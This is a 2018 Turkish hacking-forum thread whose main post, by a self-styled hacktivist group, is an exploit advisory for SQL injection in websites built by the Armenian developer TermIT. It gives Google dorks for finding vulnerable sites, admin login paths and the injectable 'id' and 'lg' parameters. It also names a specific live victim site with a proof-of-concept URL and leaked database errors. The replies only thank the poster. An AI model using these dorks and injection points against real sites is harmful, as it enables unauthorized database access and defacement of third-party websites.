Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Termit.Am Armenia Hosting SQL Injection Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 46 / 100
Rep Sayısı: 2873
Mesaj Sayısı: 6511
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Termit.Am Armenia Hosting SQL Injection Vuln
05.10.2018 18:20
################################################################################​#################

# Exploit Title : Termit.Am Armenia Hosting Պատրաստեց TermIT ընկերությունը SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : termit.am
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Պատրաստեց TermIT ընկերությունը'' site:am
intext: © 2011 Developed by TermIT
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Admin Panel Login Path :

/admin/admin.php
/login

# SQL Injection Exploit :

/index.php?id=[ID-NUMBER]&lg=[SQL Injection]

/index.php?id=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site =>

hinstitute.am/index.php?id=51%27 => [ Proof of Concept ] => archive.is/kJf08

# SQL Database Error =>

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in
/home/hinstitu/public_html/class/getvalues.table.php on line 71

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
Rep Verenler: The_ZiziL
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimiçi
Seviye Puanı: 37
Yaşam Puanı: 901 / 901
Deneyim: 4 / 100
Rep Sayısı: 585
Mesaj Sayısı: 2011
Üyelik Tarihi: 06.02.2017
     
Yorum: #2
RE: Termit.Am Armenia Hosting SQL Injection Vuln
05.10.2018 18:21
Teşekkürler, Emeğine Sağlık.

Allah’tan utanmayan insanlardan da utanmaz…
Alinti
Rep Verenler: KingSkrupellos
Mr-Spy
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 18
Deneyim: 73 / 100
Rep Sayısı: 2
Mesaj Sayısı: 8
Üyelik Tarihi: 08.10.2018
     
Yorum: #3
RE: Termit.Am Armenia Hosting SQL Injection Vuln
08.10.2018 12:11
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi